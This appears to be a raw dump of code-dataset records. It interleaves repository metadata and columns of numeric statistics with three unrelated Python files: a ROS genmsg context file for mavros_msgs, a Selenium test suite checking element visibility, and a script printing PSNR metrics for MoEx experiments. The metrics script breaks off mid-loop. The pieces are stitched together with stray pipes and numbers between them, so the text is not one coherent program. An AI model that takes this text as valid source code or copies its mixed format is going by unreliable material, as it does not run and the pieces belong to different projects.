|
[
"Apache-2.0"
] | 10
|
2021-03-15T03:58:06.000Z
|
2021-12-30T15:33:38.000Z
|
build/mavros_msgs/cmake/mavros_msgs-genmsg-context.py
|
arijitnoobstar/UAVProjectileCatcher
|
3c1bed80df167192cb4b971b58c891187628142e
|
[
"Apache-2.0"
] | 1
|
2021-09-09T15:29:31.000Z
|
2021-09-09T15:29:31.000Z
|
build/mavros_msgs/cmake/mavros_msgs-genmsg-context.py
|
arijitnoobstar/UAVProjectileCatcher
|
3c1bed80df167192cb4b971b58c891187628142e
|
[
"Apache-2.0"
] | 4
|
2021-03-06T09:35:58.000Z
|
2021-05-24T14:34:11.000Z
|
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ADSBVehicle.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ActuatorControl.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Altitude.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/AttitudeTarget.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/BatteryStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/CamIMUStamp.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/CommandCode.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/CompanionProcessStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/OnboardComputerStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/DebugValue.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ESCInfo.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ESCInfoItem.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ESCStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ESCStatusItem.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/EstimatorStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ExtendedState.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/FileEntry.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/GlobalPositionTarget.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/GPSRAW.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/GPSRTK.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilActuatorControls.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilControls.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilGPS.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilSensor.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HilStateQuaternion.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/HomePosition.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/LandingTarget.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/LogData.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/LogEntry.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ManualControl.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Mavlink.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/MountControl.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/OpticalFlowRad.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/OverrideRCIn.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Param.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/ParamValue.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/PlayTuneV2.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/PositionTarget.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RCIn.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RCOut.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RTCM.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RadioStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/RTKBaseline.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/State.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/StatusText.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Thrust.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/TimesyncStatus.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Trajectory.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/VFR_HUD.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/VehicleInfo.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Vibration.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/Waypoint.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/WaypointList.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/WaypointReached.msg;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg/WheelOdomStamped.msg"
services_str = "/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandBool.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandHome.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandInt.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandLong.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandTOL.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandTriggerControl.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandTriggerInterval.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/CommandVtolTransition.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileChecksum.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileClose.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileList.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileMakeDir.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileOpen.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileRead.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileRemove.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileRemoveDir.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileRename.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileTruncate.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/FileWrite.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/LogRequestData.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/LogRequestEnd.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/LogRequestList.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/MountConfigure.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/MessageInterval.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/ParamGet.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/ParamPull.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/ParamPush.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/ParamSet.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/SetMavFrame.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/SetMode.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/StreamRate.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/VehicleInfoGet.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/WaypointClear.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/WaypointPull.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/WaypointPush.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/WaypointSetCurrent.srv"
pkg_name = "mavros_msgs"
dependencies_str = "geographic_msgs;geometry_msgs;sensor_msgs;std_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "mavros_msgs;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg;geographic_msgs;/opt/ros/melodic/share/geographic_msgs/cmake/../msg;geometry_msgs;/opt/ros/melodic/share/geometry_msgs/cmake/../msg;sensor_msgs;/opt/ros/melodic/share/sensor_msgs/cmake/../msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg;uuid_msgs;/opt/ros/melodic/share/uuid_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 716.083333
| 4,689
| 0.874782
| 1,033
| 8,593
| 7.155857
| 0.140368
| 0.127165
| 0.472944
| 0.510281
| 0.798566
| 0.783685
| 0.783685
| 0.783685
| 0.758523
| 0
| 0
| 0.000234
| 0.003957
| 8,593
| 11
| 4,690
| 781.181818
| 0.863419
| 0.005702
| 0
| 0
| 1
| 0.333333
| 0.976235
| 0.972606
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
7e8cfba675ed7689eefe309de0560a8877742ee7
| 14,224
|
py
|
Python
|
misc/webdriver-w3c-tests/element_state/visibility_test.py
|
chenxix/crosswalk-test-suite
|
a2353dd2df912334cf6489f99bc0af4e091079a0
|
[
"BSD-3-Clause"
] | null | null | null |
misc/webdriver-w3c-tests/element_state/visibility_test.py
|
chenxix/crosswalk-test-suite
|
a2353dd2df912334cf6489f99bc0af4e091079a0
|
[
"BSD-3-Clause"
] | null | null | null |
misc/webdriver-w3c-tests/element_state/visibility_test.py
|
chenxix/crosswalk-test-suite
|
a2353dd2df912334cf6489f99bc0af4e091079a0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- mode: python; fill-column: 100; comment-column: 100; -*-
import os
import sys
import unittest
from selenium.common.exceptions import ElementNotVisibleException
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
import base_test
class NaturalNonVisibleElementsTest(base_test.WebDriverBaseTest):
def test_0x0_pixel_element_is_not_visible(self):
self.driver.get(self.webserver.where_is("element_state/res/0x0-pixels.html"))
el = self.driver.find_element_by_css("div")
self.assertFalse(el.is_displayed())
def test_0x0_pixel_text_node_is_visible(self):
self.driver.get(self.webserver.where_is("element_state/res/0x0-pixels-text-node.html"))
el = self.driver.find_element_by_css("p")
self.assertTrue(el.is_displayed())
def test_1x1_pixel_element(self):
self.driver.get(self.webserver.where_is("element_state/res/1x1-pixels.html"))
el = self.driver.find_element_by_css("p")
self.assertTrue(el.is_displayed())
def test_zero_sized_element_is_shown_if_decendant_has_size(self):
self.driver.get(self.webserver.where_is("element_state/res/zero-sized-element-with-sizable-decendant.html"))
parent = self.driver.find_element_by_id("parent")
child = self.driver.find_element_by_id("child")
self.assertTrue(parent.is_displayed())
self.assertTrue(child.is_displayed())
def test_input_type_hidden_is_never_visible(self):
self.driver.get(self.webserver.where_is("element_state/res/input-type-hidden.html"))
input = self.driver.find_element_by_css("input")
self.assertFalse(input.is_displayed())
def test_input_morphs_into_hidden(self):
self.driver.get(self.webserver.where_is("element_state/res/input-morphs-into-hidden.html"))
input = self.driver.find_element_by_css("input")
self.assertFalse(input.is_displayed())
def test_parent_node_visible_when_all_children_are_absolutely_positioned_and_overflow_is_hidden(self):
pass
def test_parent_of_absolutely_positioned_elements_visible_where_ancestor_overflow_is_hidden(self):
"""When a parent's ancestor hides any overflow, absolutely positioned child elements are
still visible. The parent container is also considered visible by webdriver for this
reason because it is interactable."""
self.driver.get(self.webserver.where_is("element_state/res/absolute-children-ancestor-hidden-overflow.html"))
ancestor = self.driver.find_element_by_css("body")
assert not ancestor.is_displayed()
children = self.driver.find_elements_by_class(".child")
assert all(child.is_displayed() for child in children)
parent = self.driver.find_element_by_id("parent")
assert parent.is_displayed()
def test_element_hidden_by_overflow_x_is_not_visible(self):
# TODO(andreastt): This test should probably be split in three. Also it's making two
# assertions.
pages = ["element_state/res/x-hidden-y-hidden.html",
"element_state/res/x-hidden-y-scroll.html",
"element_state/res/x-hidden-y-auto.html"]
for page in pages:
self.driver.get(self.webserver.where_is(page))
right = self.driver.find_element_by_id("right")
bottom_right = self.driver.find_element_by_id("bottom-right")
self.assertFalse(right.is_displayed())
self.assertFalse(bottom_right.is_displayed())
def test_element_hidden_by_overflow_y_is_not_visible(self):
# TODO(andreastt): This test should probably be split in three. Also it's making two
# assertions.
pages = ["element_state/res/x-hidden-y-hidden.html",
"element_state/res/x-scroll-y-hidden.html",
"element_state/res/x-auto-y-hidden.html"]
for page in pages:
self.driver.get(self.webserver.where_is(page))
bottom = self.driver.find_element_by_id("bottom")
bottom_right = self.driver.find_element_by_id("bottom-right")
self.assertFalse(bottom.is_displayed())
self.assertFalse(bottom_right.is_displayed())
def test_parent_node_visible_when_all_children_are_absolutely_position_and_overflow_is_hidden(self):
pass
def test_element_scrollable_by_overflow_x_is_visible(self):
pass
def test_element_scrollable_by_overflow_y_is_visible(self):
pass
def test_element_scrollable_by_overflow_x_and_y_is_visible(self):
pass
def test_element_scrollable_by_overflow_y_is_visible(self):
pass
def test_element_outside_viewport(self):
self.driver.get(self.webserver.where_is("element_state/res/element-outside-viewport.html"))
hidden = self.driver.find_element_by_css("div")
self.assertFalse(hidden.is_displayed())
def test_element_dynamically_moved_outside_viewport(self):
self.driver.get(self.webserver.where_is("element_state/res/element-dynamically-moved-outside-viewport.html"))
hidden = self.driver.find_element_by_css("div")
self.assertFalse(hidden.is_displayed())
def test_element_hidden_by_other_element(self):
self.driver.get(self.webserver.where_is("element_state/res/element-hidden-by-other-element.html"))
overlay = self.driver.find_element_by_id("overlay")
hidden = self.driver.find_element_by_id("hidden")
self.assertTrue(overlay.is_displayed())
self.assertFalse(hidden.is_displayed())
def test_element_partially_hidden_by_other_element(self):
self.driver.get(self.webserver.where_is("element_state/res/element-partially-hidden-by-other-element.html"))
partial = self.driver.find_element_by_id("partial")
self.assertTrue(partial.is_displayed())
def test_element_hidden_by_z_index(self):
self.driver.get(self.webserver.where_is("element_state/res/element-hidden-by-z-index.html"))
overlay = self.driver.find_element_by_id("overlay")
hidden = self.driver.find_element_by_id("hidden")
self.assertTrue(overlay.is_displayed())
self.assertFalse(hidden.is_displayed())
def test_element_moved_outside_viewport_by_transform(self):
self.driver.get(self.webserver.where_is("element_state/res/element-moved-outside-viewport-by-transform.html"))
el = self.driver.find_element_by_css("div")
self.assertFalse(el.is_displayed())
def test_element_moved_behind_other_element_by_transform(self):
self.driver.get(self.webserver.where_is("element_state/res/element-moved-behind-other-element-by-transform.html"))
overlay = self.driver.find_element_by_id("overlay")
hidden = self.driver.find_element_by_id("hidden")
self.assertTrue(overlay.is_displayed())
self.assertFalse(hidden.is_displayed())
def test_text_with_same_color_as_background(self):
self.driver.get(self.webserver.where_is("element_state/res/text-with-same-color-as-background.html"))
p = self.driver.find_element_by_css("p")
self.assertFalse(p.is_displayed())
def test_text_with_same_color_as_parent_background(self):
self.driver.get(self.webserver.where_is("element_state/res/text-with-same-color-as-parent-background.html"))
p = self.driver.find_element_by_css("p")
self.assertFalse(p.is_displayed())
def test_text_with_matching_color_and_background(self):
self.driver.get(self.webserver.where_is("element_state/res/text-with-matching-color-and-background.html"))
p = self.driver.find_element_by_css("p")
self.assertTrue(p.is_displayed())
def test_element_with_same_color_as_background(self):
self.driver.get(self.webserver.where_is("element_state/res/element-with-same-color-as-background.html"))
el = self.driver.find_element_by_css("div")
self.assertFalse(el.is_displayed())
def test_element_with_same_color_as_parent_background(self):
self.driver.get(self.webserver.where_is("element_state/res/element-with-same-color-as-parent-background.html"))
hidden = self.driver.find_element_by_id("hidden")
self.assertFalse(hidden.is_displayed())
class DisplayTest(base_test.WebDriverBaseTest):
def test_display_block(self):
self.driver.get(self.webserver.where_is("element_state/res/display-block.html"))
el = self.driver.find_element_by_css("p")
self.assertTrue(el.is_displayed())
def test_display_none(self):
self.driver.get(self.webserver.where_is("element_state/res/display-none.html"))
el = self.driver.find_element_by_css("p")
self.assertFalse(el.is_displayed())
def test_display_none_hides_child_node(self):
self.driver.get(self.webserver.where_is("element_state/res/display-none-child.html"))
parent = self.driver.find_element_by_id("parent")
child = self.driver.find_element_by_id("child")
self.assertFalse(parent.is_displayed())
self.assertFalse(child.is_displayed())
def test_display_none_hides_child_node_link(self):
self.driver.get(self.webserver.where_is("element_state/res/display-none-child-link.html"))
child = self.driver.find_element_by_id("child")
self.assertFalse(child.is_displayed())
def test_display_none_hides_child_node_paragraph(self):
self.driver.get(self.webserver.where_is("element_state/res/display-none-child-paragraph.html"))
child = self.driver.find_element_by_id("child")
self.assertFalse(child.is_displayed())
def test_display_none_on_parent_takes_presedence(self):
self.driver.get(self.webserver.where_is("element_state/res/display-none-parent-presedence.html"))
child = self.driver.find_element_by_id("child")
self.assertFalse(child.is_displayed())
def test_display_none_on_parent_takes_presedence_over_visibility_visible(self):
self.driver.get(self.webserver.where_is("element_state/res/display-none-parent-presedence-visibility.html"))
child = self.driver.find_element_by_id("child")
self.assertFalse(child.is_displayed())
def test_display_none_hidden_dynamically(self):
self.driver.get(self.webserver.where_is("element_state/res/display-none-dynamic.html"))
hidden = self.driver.find_element_by_id("hidden")
self.assertFalse(hidden.is_displayed())
class VisibilityTest(base_test.WebDriverBaseTest):
def test_element_state_hidden(self):
self.driver.get(self.webserver.where_is("element_state/res/visibility-hidden.html"))
el = self.driver.find_element_by_css("p")
self.assertFalse(el.is_displayed())
def test_element_state_visible(self):
self.driver.get(self.webserver.where_is("element_state/res/visibility-visible.html"))
el = self.driver.find_element_by_css("p")
self.assertTrue(el.is_displayed())
def test_visibility_hidden_hides_child_node(self):
self.driver.get(self.webserver.where_is("element_state/res/visibility-child.html"))
parent = self.driver.find_element_by_id("parent")
child = self.driver.find_element_by_id("child")
self.assertFalse(parent.is_displayed())
self.assertFalse(child.is_displayed())
def test_visibility_hidden_hides_child_node_link(self):
self.driver.get(self.webserver.where_is("element_state/res/visibility-child-link.html"))
parent = self.driver.find_element_by_id("parent")
child = self.driver.find_element_by_id("child")
self.assertFalse(parent.is_displayed())
self.assertFalse(child.is_displayed())
def test_visibility_hidden_hides_child_node_paragraph(self):
self.driver.get(self.webserver.where_is("element_state/res/visibility-child-paragraph.html"))
parent = self.driver.find_element_by_id("parent")
child = self.driver.find_element_by_id("child")
self.assertFalse(parent.is_displayed())
self.assertFalse(child.is_displayed())
def test_visibility_hidden_on_child_takes_presedence(self):
self.driver.get(self.webserver.where_is("element_state/res/visibility-child-presedence.html"))
child = self.driver.find_element_by_id("child")
self.assertTrue(child.is_displayed())
def test_visibility_hidden_on_parent_takes_presedence_over_display_block(self):
pass
def test_visibility_hidden_set_dynamically(self):
pass
def test_should_show_element_not_visible_with_hidden_attribute(self):
self.driver.get(self.webserver.where_is("element_state/res/hidden.html"))
singleHidden = self.driver.find_element('id', 'singleHidden')
self.assertFalse(singleHidden.is_displayed())
def test_should_show_element_not_visible_when_parent_element_has_hidden_attribute(self):
self.driver.get(self.webserver.where_is("element_state/res/hidden.html"))
child = self.driver.find_element('id', 'child')
self.assertFalse(child.is_displayed())
class VisibilityInteractionTest(base_test.WebDriverBaseTest):
def test_input_hidden_is_unclickable(self):
self.driver.get(self.webserver.where_is("element_state/res/input-type-hidden-unclickable.html"))
input = self.driver.find_element_by_css("input")
with self.assertRaises(ElementNotVisibleException):
input.click()
def test_hidden_input_checkbox_is_untogglable(self):
self.driver.get(self.webserver.where_is("element_state/res/hidden-input-type-checkbox-untogglable.html"))
checkbox = self.driver.find_element_by_css("input")
with self.assertRaises(ElementNotVisibleException):
checkbox.click()
def test_typing_in_hidden_input_is_impossible(self):
self.driver.get(self.webserver.where_is("element_state/res/hidden-input-type-text-writing.html"))
textfield = self.driver.find_element_by_css("input")
with self.assertRaises(ElementNotVisibleException):
textfield.send_keys("Koha is a popular Indian cheese")
class OpacityTest(base_test.WebDriverBaseTest):
pass
if __name__ == "__main__":
unittest.main()
| 45.736334
| 122
| 0.731299
| 1,925
| 14,224
| 5.086753
| 0.092468
| 0.093954
| 0.074346
| 0.109375
| 0.837316
| 0.811683
| 0.790952
| 0.751838
| 0.731005
| 0.718239
| 0
| 0.0015
| 0.156074
| 14,224
| 310
| 123
| 45.883871
| 0.814229
| 0.03234
| 0
| 0.466667
| 0
| 0
| 0.177537
| 0.155845
| 0
| 0
| 0.000437
| 0.003226
| 0.231111
| 1
| 0.213333
| false
| 0.04
| 0.022222
| 0
| 0.257778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e1ee0c7fab79db37d1432b18856a59881df3fe4
| 6,635
|
py
|
Python
|
result_metric/result_metric_MoEx.py
|
MelonDLI/ATSPrivacy
|
2cf4bd67c9c0c69092b63dcdc3d06b33acf32812
|
[
"MIT"
] | null | null | null |
result_metric/result_metric_MoEx.py
|
MelonDLI/ATSPrivacy
|
2cf4bd67c9c0c69092b63dcdc3d06b33acf32812
|
[
"MIT"
] | null | null | null |
result_metric/result_metric_MoEx.py
|
MelonDLI/ATSPrivacy
|
2cf4bd67c9c0c69092b63dcdc3d06b33acf32812
|
[
"MIT"
] | null | null | null |
import numpy as np
# #! MoEx 38-3-7+17-33-45
# file ='/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_38-3-7+17-33-45_rlabel_False/metric.npy'
# result = np.load(file,allow_pickle=True)
# sum_ = 0
# max_psnr = 0
# for i in range(len(result)):
# sum_+=result[i]['test_psnr']
# if result[i]['test_psnr']>max_psnr:
# max_psnr = result[i]['test_psnr']
# print('----------------------------------')
# print('number of result:{}'.format(len(result)))
# print('ResNet+38-3-7+17-33-45:')
# print('average: {}'.format(sum_/len(result)))
# print('max:{}'.format(max_psnr))
# #! MoEx 17-33-45
# file ='/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_17-33-45_rlabel_False/metric.npy'
# result = np.load(file,allow_pickle=True)
# sum_ = 0
# max_psnr = 0
# for i in range(len(result)):
# sum_+=result[i]['test_psnr']
# if result[i]['test_psnr']>max_psnr:
# max_psnr = result[i]['test_psnr']
# print('----------------------------------')
# print('number of result:{}'.format(len(result)))
# print('ResNet+17-33-45:')
# print('average: {}'.format(sum_/len(result)))
# print('max:{}'.format(max_psnr))
# #! MoEx 38-3-7
# file ='/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_38-3-7_rlabel_False/metric.npy'
# result = np.load(file,allow_pickle=True)
# sum_ = 0
# max_psnr = 0
# for i in range(len(result)):
# sum_+=result[i]['test_psnr']
# if result[i]['test_psnr']>max_psnr:
# max_psnr = result[i]['test_psnr']
# print('----------------------------------')
# print('number of result:{}'.format(len(result)))
# print('ResNet+38-3-7:')
# print('average: {}'.format(sum_/len(result)))
# print('max:{}'.format(max_psnr))
#! MoEx 42-3-18+29-3-41
file = '/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_42-3-18+29-3-41_rlabel_False/metric.npy'
result = np.load(file,allow_pickle=True)
sum_ = 0
max_psnr = 0
for i in range(len(result)):
sum_+=result[i]['test_psnr']
if result[i]['test_psnr']>max_psnr:
max_psnr = result[i]['test_psnr']
print('----------------------------------')
print('number of result:{}'.format(len(result)))
print('MoEx 42-3-18+29-3-41:')
print('average: {}'.format(sum_/len(result)))
print('max:{}'.format(max_psnr))
#! MoEx 29-3-41
file = '/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_29-3-41_rlabel_False/metric.npy'
result = np.load(file,allow_pickle=True)
sum_ = 0
max_psnr = 0
for i in range(len(result)):
sum_+=result[i]['test_psnr']
if result[i]['test_psnr']>max_psnr:
max_psnr = result[i]['test_psnr']
print('----------------------------------')
print('number of result:{}'.format(len(result)))
print('MoEx+29-3-41:')
print('average: {}'.format(sum_/len(result)))
print('max:{}'.format(max_psnr))
#! MoEx 42-3-18
file = '/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_42-3-18_rlabel_False/metric.npy'
result = np.load(file,allow_pickle=True)
sum_ = 0
max_psnr = 0
for i in range(len(result)):
sum_+=result[i]['test_psnr']
if result[i]['test_psnr']>max_psnr:
max_psnr = result[i]['test_psnr']
print('----------------------------------')
print('number of result:{}'.format(len(result)))
print('MoEx 42-3-18:')
print('average: {}'.format(sum_/len(result)))
print('max:{}'.format(max_psnr))
# #! MoEx 43-18-18+3-1-7
file ='/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_43-18-18+3-1-7_rlabel_False/metric.npy'
result = np.load(file,allow_pickle=True)
sum_ = 0
max_psnr = 0
for i in range(len(result)):
sum_+=result[i]['test_psnr']
if result[i]['test_psnr']>max_psnr:
max_psnr = result[i]['test_psnr']
print('----------------------------------')
print('number of result:{}'.format(len(result)))
print('MoEx+43-18-18+3-1-7:')
print('average: {}'.format(sum_/len(result)))
print('max:{}'.format(max_psnr))
#! MoEx 3-1-7+43-18-18
file = '/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_3-1-7+43-18-18_rlabel_False/metric.npy'
result = np.load(file,allow_pickle=True)
sum_ = 0
max_psnr = 0
for i in range(len(result)):
sum_+=result[i]['test_psnr']
if result[i]['test_psnr']>max_psnr:
max_psnr = result[i]['test_psnr']
print('----------------------------------')
print('number of result:{}'.format(len(result)))
print('ResNet+3-1-7+43-18-18:')
print('average: {}'.format(sum_/len(result)))
print('max:{}'.format(max_psnr))
#! MoEx 43-18-18
file = '/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_43-18-18_rlabel_False/metric.npy'
result = np.load(file,allow_pickle=True)
sum_ = 0
max_psnr = 0
for i in range(len(result)):
sum_+=result[i]['test_psnr']
if result[i]['test_psnr']>max_psnr:
max_psnr = result[i]['test_psnr']
print('----------------------------------')
print('number of result:{}'.format(len(result)))
print('ResNet+43-18-18:')
print('average: {}'.format(sum_/len(result)))
print('max:{}'.format(max_psnr))
#! MoEx 3-1-7
file = '/home/remote/u7076589/ATSPrivacy/benchmark/images/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_inversed_mode_aug_auglist_3-1-7_rlabel_False/metric.npy'
result = np.load(file,allow_pickle=True)
sum_ = 0
max_psnr = 0
for i in range(len(result)):
